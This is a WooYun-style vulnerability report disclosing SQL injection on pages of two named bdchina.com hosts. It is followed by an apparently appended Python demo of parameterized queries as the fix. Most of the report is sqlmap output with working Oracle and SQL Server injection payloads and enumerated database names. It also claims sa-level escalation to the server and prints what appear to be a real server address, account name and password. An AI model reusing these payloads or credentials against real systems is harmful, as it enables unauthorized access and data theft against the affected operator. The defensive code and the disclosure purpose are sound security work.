WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online browsing -------- http://drop.zone.ci/
2015-02-12: Details reported to the vendor; awaiting the vendor's handling
2015-02-17: Vendor confirmed; details disclosed to the vendor only
2015-02-27: Details disclosed to core white hats and experts in the relevant field
2015-03-09: Details disclosed to regular white hats
2015-03-19: Details disclosed to intern white hats
2015-03-29: Details disclosed to the public
First, a note: I submitted this vulnerability on the Butian platform in October last year. I happened to check today and it still has not been fixed. Submitting it here is not double-reporting; I just hope the vendor fixes it as soon as possible, and I do not need any RANK reward or the like. The vendor appears to belong to the Shandong branch of China Unicom.
1. Injection point
http://enpower.bdchina.com:8001/jxt/news/bulletinTemplate.jsp?id=1992
http://enpower.bdchina.com:8001/jxt/news/newsTemplate.jsp?id=2117
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2117 AND 6997=6997

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=2117 AND 7156=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(114)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (7156=7156) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(106)||CHR(102)||CHR(113)||CHR(62))) FROM DUAL)

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=2117 AND 4709=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(110)||CHR(81)||CHR(80),5)
---
[12:43:38] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:43:38] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:43:38] [INFO] fetching database (schema) names
[12:43:39] [INFO] the SQL query used returns 28 entries
[12:43:39] [INFO] retrieved: CTXSYS
[12:43:40] [INFO] retrieved: HR
[12:43:41] [INFO] retrieved: JIAXIAOTONG
[12:43:41] [INFO] retrieved: JXTFORUM
[12:43:42] [INFO] retrieved: JXTIM
[12:43:42] [INFO] retrieved: JXTT
[12:43:43] [INFO] retrieved: MDSYS
[12:43:43] [INFO] retrieved: ODM
[12:43:44] [INFO] retrieved: ODM_MTR
[12:43:45] [INFO] retrieved: OE
[12:43:45] [INFO] retrieved: OLAPSYS
[12:43:46] [INFO] retrieved: ORDSYS
[12:43:46] [INFO] retrieved: OUTLN
[12:43:47] [INFO] retrieved: PM
[12:43:48] [INFO] retrieved: QS
[12:43:48] [INFO] retrieved: QS_CBADM
[12:43:49] [INFO] retrieved: QS_CS
[12:43:49] [INFO] retrieved: QS_ES
[12:43:50] [INFO] retrieved: QS_OS
[12:43:51] [INFO] retrieved: QS_WS
[12:43:51] [INFO] retrieved: RMAN
[12:43:52] [INFO] retrieved: SCOTT
[12:43:52] [INFO] retrieved: SH
[12:43:53] [INFO] retrieved: SYS
[12:43:54] [INFO] retrieved: SYSTEM
[12:43:54] [INFO] retrieved: WKSYS
[12:43:55] [INFO] retrieved: WMSYS
[12:43:55] [INFO] retrieved: XDB
available databases [28]:
[*] CTXSYS
[*] HR
[*] JIAXIAOTONG
[*] JXTFORUM
[*] JXTIM
[*] JXTT
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

[12:43:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 62 times
[12:43:55] [INFO] fetched data logged to text files under 'C:\sqlmap\output\enpower.bdchina.com'

[*] shutting down at 12:43:55
2. Injection point
http://xiangcesw.bdchina.com/taphoto.aspx?ID=7197&ZID=902
http://xiangcesw.bdchina.com/pic_all.aspx?ZID=902
http://xiangcesw.bdchina.com/photoOtherHomeFolder.aspx?ID=7197
http://xiangcesw.bdchina.com/searchFolder.aspx?BID=%E6%88%B7%E5%A4%96%20%E8%BF%90%E5%8A%A8
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=7574' AND 8430=8430 AND 'ksbY'='ksbY

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=7574' AND 8238=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (8238=8238) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'DKvK'='DKvK

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=7574'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=7574' WAITFOR DELAY '0:0:5'--
---
[12:44:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[12:44:11] [INFO] fetching database names
[12:44:11] [INFO] the SQL query used returns 8 entries
[12:44:11] [INFO] resumed: master
[12:44:11] [INFO] resumed: model
[12:44:11] [INFO] resumed: msdb
[12:44:11] [INFO] resumed: ReportServer
[12:44:11] [INFO] resumed: ReportServerTempDB
[12:44:11] [INFO] resumed: tempdb
[12:44:11] [INFO] resumed: xiangce
[12:44:11] [INFO] resumed: xiangce_iptv
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xiangce
[*] xiangce_iptv

[12:44:11] [INFO] fetched data logged to text files under 'C:\sqlmap\output\xiangcesw.bdchina.com'

[*] shutting down at 12:44:11
sa privileges; escalated straight to the server!
61.156.7.61:7788, account: caibi, password: 115175
Filter input strictly!
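The remediation above is the whole of the report's fix guidance. As an added illustration (not code from the report or from the affected sites), the block below puts the anti-pattern behind a page like `bulletinTemplate.jsp?id=...` next to a hardened version, and replays the TRUE and FALSE halves of the boolean-based probe sqlmap listed (`id=2117 AND 6997=6997`) against both. SQLite stands in for Oracle and SQL Server so it runs offline; the `news` table, its rows and the function names are constructed for the demo. The point it makes concrete: the concatenated query yields a different result for the two probes (the oracle a blind injection reads), while type validation plus a bound parameter returns nothing for either, because the value never becomes SQL syntax.

```python
import sqlite3

# Constructed stand-in for the bulletin/news table behind the vulnerable page.
# SQLite replaces Oracle/MSSQL so the demo is self-contained; the injection
# mechanics shown here do not depend on the engine.
SAMPLE_ROWS = [(1992, "Bulletin A"), (2117, "News B"), (2118, "News C")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The anti-pattern: the request parameter is spliced into the SQL text.

    Whatever follows the number becomes part of the WHERE clause, which is
    exactly what the boolean-based and error-based probes in the report rely on.
    """
    sql = "SELECT title FROM news WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Strict filtering plus parameter binding.

    1. Validate the value against its expected type (an id is an integer);
       anything else is rejected before any SQL is built.
    2. Pass the validated value as a bound parameter, so the driver sends it
       as data and never as SQL syntax.
    """
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        return []
    cur = conn.execute("SELECT title FROM news WHERE id = ?", (id_value,))
    return [row[0] for row in cur]


def compare(conn, raw_id):
    """Run one input through both implementations for a side-by-side view."""
    try:
        vuln = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error as exc:
        # A database error leaking to the client is the signal an error-based
        # probe reads; the hardened path never reaches the database here.
        vuln = f"SQL error: {exc}"
    return {"vulnerable": vuln, "safe": lookup_safe(conn, raw_id)}


def demo():
    conn = make_db()
    # The legitimate value, the TRUE and FALSE halves of the probe sqlmap
    # reported (id=2117 AND 6997=6997), and a lone quote that breaks the syntax.
    probes = ["2117", "2117 AND 6997=6997", "2117 AND 6997=6998", "2117'"]
    return {p: compare(conn, p) for p in probes}


if __name__ == "__main__":
    for probe, result in demo().items():
        print(f"{probe!r:24} vulnerable={result['vulnerable']!r:26} safe={result['safe']!r}")
```

The same binding discipline covers string-typed parameters such as the `ID=7574'` case on the ASP.NET host: in JSP/JDBC that is a `PreparedStatement` with `setInt`/`setString`, in ASP.NET a `SqlParameter` on the `SqlCommand`. Filtering alone (stripping quotes or keywords) is the weaker half of the fix; the type check here rejects bad input early, but it is the bound parameter that makes the query safe regardless of what the filter misses.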
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-02-17 08:19
None yet